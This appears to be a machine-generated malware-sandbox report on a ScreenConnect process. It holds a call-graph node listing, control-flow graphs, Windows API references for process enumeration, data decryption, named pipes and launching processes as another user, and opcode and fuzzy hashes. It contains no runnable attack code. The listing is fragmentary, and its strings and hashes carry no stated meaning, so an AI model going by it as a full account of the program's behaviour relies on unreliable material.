50393->50394 50395 5da89ae 50394->50395 50401 4a3b3d6 50394->50401 50395->50379 50398 5da96d3 50397->50398 50399 5da9698 50397->50399 50398->50399 50400 4a3b3d6 5 API calls 50398->50400 50399->50379 50400->50399 50403 4a3b3e0 50401->50403 50402 4a3b669 50402->50395 50403->50402 50409 4a3e5e7 50403->50409 50414 4a3ec7f 50403->50414 50419 4a3e358 50403->50419 50426 4a3e308 50403->50426 50433 4a3ec76 50403->50433 50410 4a3e5f3 50409->50410 50438 50e20d0 50410->50438 50444 50e20e0 50410->50444 50411 4a3ed66 50411->50411 50415 4a3ec8a 50414->50415 50417 50e20d0 CreateFileA 50415->50417 50418 50e20e0 CreateFileA 50415->50418 50416 4a3ed66 50416->50416 50417->50416 50418->50416 50420 4a3e389 50419->50420 50467 4a3eed9 50420->50467 50421 4a3e3df 50423 50e20d0 CreateFileA 50421->50423 50424 50e20e0 CreateFileA 50421->50424 50422 4a3ed66 50422->50422 50423->50422 50424->50422 50427 4a3e30d 50426->50427 50432 4a3eed9 4 API calls 50427->50432 50428 4a3e3df 50430 50e20d0 CreateFileA 50428->50430 50431 50e20e0 CreateFileA 50428->50431 50429 4a3ed66 50429->50429 50430->50429 50431->50429 50432->50428 50434 4a3ecd9 50433->50434 50436 50e20d0 CreateFileA 50434->50436 50437 50e20e0 CreateFileA 50434->50437 50435 4a3ed66 50435->50435 50436->50435 50437->50435 50439 50e20e0 50438->50439 50441 50e2117 50439->50441 50450 50e2230 50439->50450 50441->50411 50442 50e2230 CreateFileA 50442->50441 50445 50e20fe 50444->50445 50447 50e2117 50445->50447 50448 50e2230 CreateFileA 50445->50448 50446 50e2140 50449 50e2230 CreateFileA 50446->50449 50447->50411 50448->50446 50449->50447 50451 50e224d 50450->50451 50455 50e7102 50451->50455 50459 50e7110 50451->50459 50456 50e710b 50455->50456 50463 50e6d9c 50456->50463 50460 50e7123 50459->50460 50461 50e6d9c CreateFileA 50460->50461 50462 50e2140 50461->50462 50462->50442 50465 50e7160 50463->50465 50464 50e7233 CreateFileA 50466 50e7295 50464->50466 50465->50464 50465->50465 50468 4a3ef0c 50467->50468 50469 4a3ef54 50468->50469 50472 5da6098 50468->50472 50480 5da60a8 50468->50480 50469->50421 50473 5da60cc 50472->50473 50475 5da60dc 50472->50475 50474 5da60d5 50473->50474 50476 5da6218 4 API calls 50473->50476 50477 5da6228 4 API calls 50473->50477 50474->50469 50488 5da6218 50475->50488 50495 5da6228 50475->50495 50476->50473 50477->50473 50481 5da60dc 50480->50481 50482 5da60cc 50480->50482 50486 5da6218 4 API calls 50481->50486 50487 5da6228 4 API calls 50481->50487 50483 5da60d5 50482->50483 50484 5da6218 4 API calls 50482->50484 50485 5da6228 4 API calls 50482->50485 50483->50469 50484->50482 50485->50482 50486->50482 50487->50482 50489 5da6228 50488->50489 50490 5da624d 50489->50490 50502 5da63a8 50489->50502 50509 5da6397 50489->50509 50491 5da6256 50490->50491 50516 5da5630 50490->50516 50491->50473 50496 5da624d 50495->50496 50498 5da625d 50495->50498 50497 5da6256 50496->50497 50499 5da5630 ProcessIdToSessionId 50496->50499 50497->50473 50500 5da63a8 2 API calls 50498->50500 50501 5da6397 2 API calls 50498->50501 50499->50496 50500->50496 50501->50496 50506 5da63d2 50502->50506 50508 5da63bf 50502->50508 50503 5da63c8 50503->50490 50504 5da653a K32EnumProcesses 50505 5da6572 50504->50505 50505->50490 50506->50508 50519 5da563c 50506->50519 50508->50503 50508->50504 50513 5da63a8 50509->50513 50510 5da63c8 50510->50490 50511 5da653a K32EnumProcesses 50512 5da6572 50511->50512 50512->50490 50514 5da563c K32EnumProcesses 50513->50514 50515 5da63bf 50513->50515 50514->50513 50515->50510 50515->50511 50517 5da65e0 ProcessIdToSessionId 50516->50517 50518 5da6653 50517->50518 50518->50490 50521 5da64e8 K32EnumProcesses 50519->50521 50522 5da6572 50521->50522 50522->50506 50367 50e0040 50368 50e0093 CreateProcessAsUserW 50367->50368 50370 50e0124 50368->50370 50527 4065f28 50529 4065f4c 50527->50529 50530 4065f5c 50527->50530 50528 4065f55 50529->50528 50531 40664fd 3 API calls 50529->50531 50532 4066558 3 API calls 50529->50532 50535 40664fd 50530->50535 50544 4066558 50530->50544 50531->50529 50532->50529 50537 406653d 50535->50537 50536 40664ee 50537->50536 50539 406657b 50537->50539 50552 107f941 50537->50552 50566 107f950 50537->50566 50538 4066584 50538->50529 50539->50538 50542 107f941 3 API calls 50539->50542 50543 107f950 3 API calls 50539->50543 50542->50539 50543->50539 50545 406658b 50544->50545 50547 406657b 50544->50547 50548 107f941 3 API calls 50545->50548 50549 107f950 3 API calls 50545->50549 50546 4066584 50546->50529 50547->50546 50550 107f941 3 API calls 50547->50550 50551 107f950 3 API calls 50547->50551 50548->50547 50549->50547 50550->50547 50551->50547 50553 107f983 50552->50553 50565 107f973 50552->50565 50555 107f941 3 API calls 50553->50555 50560 107f950 3 API calls 50553->50560 50553->50565 50580 107fad8 50553->50580 50590 107fac8 50553->50590 50600 107a4c8 50553->50600 50605 40648a0 50553->50605 50613 40648b0 50553->50613 50620 107a4b8 50553->50620 50554 107f97c 50554->50539 50555->50565 50560->50565 50563 40648a0 3 API calls 50563->50565 50564 40648b0 3 API calls 50564->50565 50565->50554 50565->50563 50565->50564 50567 107f973 50566->50567 50569 107f983 50566->50569 50568 107f97c 50567->50568 50578 40648a0 3 API calls 50567->50578 50579 40648b0 3 API calls 50567->50579 50568->50539 50569->50567 50570 107f941 3 API calls 50569->50570 50571 40648a0 3 API calls 50569->50571 50572 107fac8 3 API calls 50569->50572 50573 107a4c8 3 API calls 50569->50573 50574 40648b0 3 API calls 50569->50574 50575 107f950 3 API calls 50569->50575 50576 107fad8 3 API calls 50569->50576 50577 107a4b8 3 API calls 50569->50577 50570->50567 50571->50567 50572->50567 50573->50567 50574->50567 50575->50567 50576->50567 50577->50567 50578->50567 50579->50567 50581 107fadb 50580->50581 50582 107fafb 50581->50582 50586 107f941 3 API calls 50581->50586 50587 107f950 3 API calls 50581->50587 50588 107fac8 3 API calls 50581->50588 50589 107fad8 3 API calls 50581->50589 50585 107fb04 50582->50585 50625 4060040 50582->50625 50630 4060006 50582->50630 50585->50565 50586->50582 50587->50582 50588->50582 50589->50582 50592 107fad3 50590->50592 50591 107fafb 50593 4060006 3 API calls 50591->50593 50594 4060040 3 API calls 50591->50594 50595 107fb04 50591->50595 50592->50591 50596 107f941 3 API calls 50592->50596 50597 107f950 3 API calls 50592->50597 50598 107fac8 3 API calls 50592->50598 50599 107fad8 3 API calls 50592->50599 50593->50595 50594->50595 50595->50565 50596->50591 50597->50591 50598->50591 50599->50591 50601 107a4f9 50600->50601 50602 107a4ed 50600->50602 50601->50602 50603 40648a0 3 API calls 50601->50603 50604 40648b0 3 API calls 50601->50604 50602->50565 50603->50602 50604->50602 50607 406482a 50605->50607 50608 40648a6 50605->50608 50606 40648dd 50606->50565 50607->50565 50609 40648d4 50608->50609 50610 107f941 3 API calls 50608->50610 50611 107f950 3 API calls 50608->50611 50609->50606 50612 40666f0 3 API calls 50609->50612 50610->50609 50611->50609 50612->50606 50615 40648e4 50613->50615 50616 40648d4 50613->50616 50614 40648dd 50614->50565 50618 107f941 3 API calls 50615->50618 50619 107f950 3 API calls 50615->50619 50616->50614 50617 40666f0 3 API calls 50616->50617 50617->50614 50618->50616 50619->50616 50621 107a4c8 50620->50621 50622 107a4ed 50621->50622 50623 40648a0 3 API calls 50621->50623 50624 40648b0 3 API calls 50621->50624 50622->50565 50623->50622 50624->50622 50626 406005f 50625->50626 50629 4060510 3 API calls 50626->50629 50635 4060502 50626->50635 50627 40600d1 50627->50585 50629->50627 50631 4060017 50630->50631 50633 4060502 3 API calls 50631->50633 50634 4060510 3 API calls 50631->50634 50632 40600d1 50632->50585 50633->50632 50634->50632 50636 406050b 50635->50636 50637 4060536 50636->50637 50638 50e1100 3 API calls 50636->50638 50639 50e10f0 3 API calls 50636->50639 50637->50627 50638->50637 50639->50637

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 4a3e358-4a3e42d call 4a3eed9 call 4a3f2b8 15 4a3e462-4a3e4f2 0->15 16 4a3e42f-4a3e457 0->16 30 4a3e4f4-4a3e519 call 4a3f64f 15->30 31 4a3e53a-4a3e589 call 4a3e01c 15->31 16->15 32 4a3e51f-4a3e535 30->32 41 4a3e58b-4a3e5b9 31->41 42 4a3e5bc-4a3e6f4 call 4a3e034 31->42 36 4a3ecd9-4a3ed5d 32->36 154 4a3ed60 call 50e20d0 36->154 155 4a3ed60 call 50e20e0 36->155 41->42 58 4a3e6f6-4a3e702 42->58 59 4a3e70a-4a3e78d 42->59 54 4a3ed66-4a3ee11 82 4a3ee13-4a3ee16 54->82 83 4a3ee1f 54->83 58->59 73 4a3e8c3-4a3e8e6 59->73 74 4a3e793-4a3e7c6 59->74 84 4a3e919-4a3e941 73->84 85 4a3e8e8-4a3e916 73->85 88 4a3e8a6 74->88 89 4a3e7cc-4a3e7ec 74->89 82->83 90 4a3ee20 83->90 98 4a3e943-4a3e971 84->98 99 4a3e977-4a3e9a4 84->99 85->84 92 4a3e8ab-4a3e8b2 88->92 100 4a3e7f2-4a3e7fb 89->100 101 4a3e891-4a3e8a4 89->101 90->90 95 4a3e8c0-4a3e8c1 92->95 96 4a3e8b4 92->96 95->73 96->95 98->99 107 4a3e9d6-4a3ea02 99->107 108 4a3e9a6-4a3e9d0 99->108 100->88 103 4a3e801-4a3e80f 100->103 101->92 111 4a3e881-4a3e88b 103->111 112 4a3e811-4a3e826 103->112 117 4a3ea34-4a3eadf 107->117 118 4a3ea04-4a3ea2e 107->118 108->107 111->100 111->101 115 4a3e874-4a3e876 112->115 116 4a3e828-4a3e872 112->116 115->111 116->115 136 4a3eb11-4a3eb54 117->136 137 4a3eae1-4a3eb0b 117->137 118->117 145 4a3eb56-4a3eb98 136->145 146 4a3eb9a-4a3ebb6 136->146 137->136 145->146 149 4a3ebc4 146->149 150 4a3ebb8 146->150 149->36 150->149 154->54 155->54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K&n^$[&n^$cCj$k&n^${&n^
                                                                                  • API String ID: 0-3409782914
                                                                                  • Opcode ID: 09c55ebd37a4e167ee3d228169ed61ff24e6be66435c99f8d757eaf14023a5a5
                                                                                  • Instruction ID: 2009c4a50f59cc7ed93a155fcc3de14a202cd99d67589083791b31c6ac573ba5
                                                                                  • Opcode Fuzzy Hash: 09c55ebd37a4e167ee3d228169ed61ff24e6be66435c99f8d757eaf14023a5a5
                                                                                  • Instruction Fuzzy Hash: 77324C74A402198FDB14DF28D955B9DB7B2FF88304F1485A9E409AB365EB34ED46CF80

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 414 50e054c-50e14da 416 50e14dc-50e14df 414->416 417 50e14e2-50e1547 CreateNamedPipeW 414->417 416->417 419 50e1549-50e154f 417->419 420 50e1550-50e1571 417->420 419->420
                                                                                  APIs
                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 050E1534
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateNamedPipe
                                                                                  • String ID: 4L_q
                                                                                  • API String ID: 2489174969-1034732671
                                                                                  • Opcode ID: 0a51a439ca3795753fbc01fcfe6b4e809636fdaad8ef1d4b321e28ed67da604d
                                                                                  • Instruction ID: 9ea72459ec39d5c5e91f7907604194d2ae749b803f67254b07037d517fe09c0e
                                                                                  • Opcode Fuzzy Hash: 0a51a439ca3795753fbc01fcfe6b4e809636fdaad8ef1d4b321e28ed67da604d
                                                                                  • Instruction Fuzzy Hash: 423105B1800348EFCB10CF9AD588A8EBFF5BF48314F24C059E919AB221D375A955CFA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `Q_q
                                                                                  • API String ID: 0-1832742057
                                                                                  • Opcode ID: 92557b283bef06acf5694a0292cbed4b81b3d7ff759050c1aa1e37ae36986268
                                                                                  • Instruction ID: 0e9dff9fbb70279ec3b13a9cdf019481302b76ecfc80c13d5ceecfe6111e54d6
                                                                                  • Opcode Fuzzy Hash: 92557b283bef06acf5694a0292cbed4b81b3d7ff759050c1aa1e37ae36986268
                                                                                  • Instruction Fuzzy Hash: 68E22970A00219CFDB25EF28C94469DBBF6FF89305F1085E9E509A7264EB75AE85CF40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2616681690.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4a30000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ;Yn^
                                                                                  • API String ID: 0-1462968236
                                                                                  • Opcode ID: 7035235bdd7f3f481111c1ab2a01fbdafd98123248a54b676f363c68c80d5b49
                                                                                  • Instruction ID: 4df822705071136a47824fb88f21a61e3db5434cfbf36ea6f55d9822051256f2
                                                                                  • Opcode Fuzzy Hash: 7035235bdd7f3f481111c1ab2a01fbdafd98123248a54b676f363c68c80d5b49
                                                                                  • Instruction Fuzzy Hash: B9627071E002198FDB24DF65CC94BADB7F2BF88310F1485A9E549AB251EB70AD85CF90
                                                                                  APIs
                                                                                  • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 050E010F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcessUser
                                                                                  • String ID:
                                                                                  • API String ID: 2217836671-0
                                                                                  • Opcode ID: d9822df21bdeaeb175a00e0ccdc25441f34e3cc85cf8d529b72e6d192476f097
                                                                                  • Instruction ID: a5fde7f32a1ea682e7af3a4ffe4e797148f646abd6925fc5278ceea9066bef5c
                                                                                  • Opcode Fuzzy Hash: d9822df21bdeaeb175a00e0ccdc25441f34e3cc85cf8d529b72e6d192476f097
                                                                                  • Instruction Fuzzy Hash: 56412272900209DFCB11CFA9D884ADEBBF5FF48310F15842AE918A7250D775A955CFA0
                                                                                  APIs
                                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 0406176E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2612501769.0000000004060000.00000040.00000800.00020000.00000000.sdmp, Offset: 04060000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4060000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataProtect
                                                                                  • String ID:
                                                                                  • API String ID: 3091777813-0
                                                                                  • Opcode ID: c280ffe2c70530edd1474be98f917d1ce3f017ce387d19296381b25341d611a0
                                                                                  • Instruction ID: 38a6d4e091fc66fbcc6567ad2a7ed6913f494dff8138db92c026d60dede85a32
                                                                                  • Opcode Fuzzy Hash: c280ffe2c70530edd1474be98f917d1ce3f017ce387d19296381b25341d611a0
                                                                                  • Instruction Fuzzy Hash: A22159B6800209DFCB10CF9AC844ADEBBF5FB48310F148429E919B7210D375A555DFA1
                                                                                  APIs
                                                                                  • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 0406176E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2612501769.0000000004060000.00000040.00000800.00020000.00000000.sdmp, Offset: 04060000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_4060000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataProtect
                                                                                  • String ID:
                                                                                  • API String ID: 3091777813-0
                                                                                  • Opcode ID: 5dd4ba9567b71f1de1f35cd2a05583d87d9eb83e18058fd309bf552309284139
                                                                                  • Instruction ID: 519cfe6c25eae8d8897ad242b4a5ce15a50bd80daf68b224dc0fce9069907868
                                                                                  • Opcode Fuzzy Hash: 5dd4ba9567b71f1de1f35cd2a05583d87d9eb83e18058fd309bf552309284139
                                                                                  • Instruction Fuzzy Hash: 4F2137B6C00249DFDB10CF9AC844ADEBBF5FB48310F158419E929B7250D339A555DFA1
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05DA2F15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: db4ac6e5367b92daebf2a5e93be7f999451f5c772561dc43239105d85311d5fa
                                                                                  • Instruction ID: eb3226e93cee0c96426bb50cf84d16aa0f508c0bf5331f47c7bff4f8b600da59
                                                                                  • Opcode Fuzzy Hash: db4ac6e5367b92daebf2a5e93be7f999451f5c772561dc43239105d85311d5fa
                                                                                  • Instruction Fuzzy Hash: B2217976800349DFCB10CF9AC845ADEBFF5EF48320F15805AE958A7211C339A555CFA5
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05DA2F15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: 39932a4d409ce3a24504543f970172d2e90e5250e3adaab5d8bbbcb6d617fd3f
                                                                                  • Instruction ID: 928c9b64f076c712082a739c8b427e246b3c715be0da64b911dffe0887439e86
                                                                                  • Opcode Fuzzy Hash: 39932a4d409ce3a24504543f970172d2e90e5250e3adaab5d8bbbcb6d617fd3f
                                                                                  • Instruction Fuzzy Hash: 902147B6800249DFDF10CF9AC845BEEBBF5EB48320F10845AE918A7250D339A955DFA5
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05DA2F15
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2620043816.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_5da0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CryptDataUnprotect
                                                                                  • String ID:
                                                                                  • API String ID: 834300711-0
                                                                                  • Opcode ID: 310a64a49afba46ec7be874e05a842ff772c839a4fa68517219d4fb2a7c4af03
                                                                                  • Instruction ID: 5555e2c9684a275c66423efccc0a75efa58b03223a57555941d2556f250acfd8
                                                                                  • Opcode Fuzzy Hash: 310a64a49afba46ec7be874e05a842ff772c839a4fa68517219d4fb2a7c4af03
                                                                                  • Instruction Fuzzy Hash: 1E2114B6800249DFCF10DF9AC845BEEBBF4EB48320F14841AE928A7250D339A555DFA5

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 292 50e1370-50e13f6 301 50e13f8-50e13fa 292->301 302 50e1401-50e140d 292->302 301->302 304 50e140f-50e1416 302->304 305 50e1418-50e141a 302->305 304->305 306 50e141c-50e1423 304->306 307 50e1428-50e1450 305->307 308 50e1425 306->308 309 50e1482-50e14da 306->309 312 50e1459 307->312 313 50e1452-50e1457 307->313 308->307 315 50e14dc-50e14df 309->315 316 50e14e2-50e1547 CreateNamedPipeW 309->316 314 50e145e-50e1473 call 50e054c 312->314 313->314 318 50e1478-50e147f 314->318 315->316 320 50e1549-50e154f 316->320 321 50e1550-50e1571 316->321 320->321
                                                                                  APIs
                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 050E1534
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateNamedPipe
                                                                                  • String ID: 4L_q$d/eq
                                                                                  • API String ID: 2489174969-1922638829
                                                                                  • Opcode ID: ea899a3d4858b7d466f99882f2440398131a0726ef813afb149d2638d2849135
                                                                                  • Instruction ID: 37a4716889040149f7542cc9bf660b3ab831f942dfea3d257d3e7502ec3caa13
                                                                                  • Opcode Fuzzy Hash: ea899a3d4858b7d466f99882f2440398131a0726ef813afb149d2638d2849135
                                                                                  • Instruction Fuzzy Hash: 6161A371A00309DFCB14DFA9D844B9EBBF6BF88300F24806AE919EB391D7759905CB61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 324 50e6d7f-50e6d99 326 50e6d9b-50e6da3 324->326 327 50e6da8-50e6db0 324->327 328 50e7160-50e71bc 326->328 332 50e6e2c-50e6e2f 327->332 333 50e6db2-50e6db9 327->333 329 50e71be-50e71e3 328->329 330 50e7210-50e7293 CreateFileA 328->330 329->330 339 50e71e5-50e71e7 329->339 344 50e729c-50e72da 330->344 345 50e7295-50e729b 330->345 335 50e6e75-50e6e80 332->335 337 50e6dbb-50e6df7 333->337 338 50e6d53-50e6d78 333->338 335->328 337->335 338->324 341 50e720a-50e720d 339->341 342 50e71e9-50e71f3 339->342 341->330 346 50e71f7-50e7206 342->346 347 50e71f5 342->347 353 50e72dc-50e72e0 344->353 354 50e72ea 344->354 345->344 346->346 349 50e7208 346->349 347->346 349->341 353->354 355 50e72e2 353->355 356 50e72eb 354->356 355->354 356->356
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 050E727D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: 4L_q
                                                                                  • API String ID: 823142352-1034732671
                                                                                  • Opcode ID: 9b73f56d960b794f2e80fd299085e42dfba1bf318dd97cad1a22472f3277efd5
                                                                                  • Instruction ID: 5b726fcb003003a60d015a44165b5aae0e3b3c9eb836dbd91530fc2ac2cfac8b
                                                                                  • Opcode Fuzzy Hash: 9b73f56d960b794f2e80fd299085e42dfba1bf318dd97cad1a22472f3277efd5
                                                                                  • Instruction Fuzzy Hash: 03618A71C083988FDB01CFA8D8947DEBFF1EF15304F19816AD849AB296D7748845CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 357 50e7156-50e7159 358 50e715f-50e71bc 357->358 359 50e715b 357->359 361 50e71be-50e71e3 358->361 362 50e7210-50e7293 CreateFileA 358->362 359->358 361->362 365 50e71e5-50e71e7 361->365 369 50e729c-50e72da 362->369 370 50e7295-50e729b 362->370 367 50e720a-50e720d 365->367 368 50e71e9-50e71f3 365->368 367->362 371 50e71f7-50e7206 368->371 372 50e71f5 368->372 377 50e72dc-50e72e0 369->377 378 50e72ea 369->378 370->369 371->371 373 50e7208 371->373 372->371 373->367 377->378 379 50e72e2 377->379 380 50e72eb 378->380 379->378 380->380
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 050E727D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: 4L_q
                                                                                  • API String ID: 823142352-1034732671
                                                                                  • Opcode ID: a98fe13fbd6cdb377f7e3fc4cda2a5ab3d678f134a0602cb136e7838231603ef
                                                                                  • Instruction ID: a996d355aa7d3156c1dbf6231278a2fb62f47ffadfe01a57b07c0c0cfb47d36c
                                                                                  • Opcode Fuzzy Hash: a98fe13fbd6cdb377f7e3fc4cda2a5ab3d678f134a0602cb136e7838231603ef
                                                                                  • Instruction Fuzzy Hash: 5C5164B1D00388DFDB10CFA9D985B9EBBF2FB48304F248029E808AB255D7759845CF91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 381 50e6d9c-50e71bc 383 50e71be-50e71e3 381->383 384 50e7210-50e7293 CreateFileA 381->384 383->384 387 50e71e5-50e71e7 383->387 391 50e729c-50e72da 384->391 392 50e7295-50e729b 384->392 389 50e720a-50e720d 387->389 390 50e71e9-50e71f3 387->390 389->384 393 50e71f7-50e7206 390->393 394 50e71f5 390->394 399 50e72dc-50e72e0 391->399 400 50e72ea 391->400 392->391 393->393 395 50e7208 393->395 394->393 395->389 399->400 401 50e72e2 399->401 402 50e72eb 400->402 401->400 402->402
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 050E727D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID: 4L_q
                                                                                  • API String ID: 823142352-1034732671
                                                                                  • Opcode ID: f17905f0933718550cc63b84a53b3c4709896982c5117344e8d869eebd755706
                                                                                  • Instruction ID: 623dea0c7869e22fd68db71afb37ef236170265fef8ce1ebe7b754afa7e6c51a
                                                                                  • Opcode Fuzzy Hash: f17905f0933718550cc63b84a53b3c4709896982c5117344e8d869eebd755706
                                                                                  • Instruction Fuzzy Hash: C25143B0D00388DFDB10CFA9D985B9EBBF2FB48304F248129E809AB255D7759845CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 403 50e0530-50e14da 407 50e14dc-50e14df 403->407 408 50e14e2-50e1547 CreateNamedPipeW 403->408 407->408 410 50e1549-50e154f 408->410 411 50e1550-50e1571 408->411 410->411
                                                                                  APIs
                                                                                  • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 050E1534
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2617654503.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_50e0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateNamedPipe
                                                                                  • String ID: 4L_q
                                                                                  • API String ID: 2489174969-1034732671
                                                                                  • Opcode ID: 00e176b48707684add752e03caf9370614384cd18c210c48dd9d22a930344212
                                                                                  • Instruction ID: e9995e8133172daa8c40085e569ec087420a49f348f00686a46a532231c38c65
                                                                                  • Opcode Fuzzy Hash: 00e176b48707684add752e03caf9370614384cd18c210c48dd9d22a930344212
                                                                                  • Instruction Fuzzy Hash: BD3158B2805348DFCB11CFA9D494ACEBFF1BF49310F25806AE859AB222D3759945CB61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
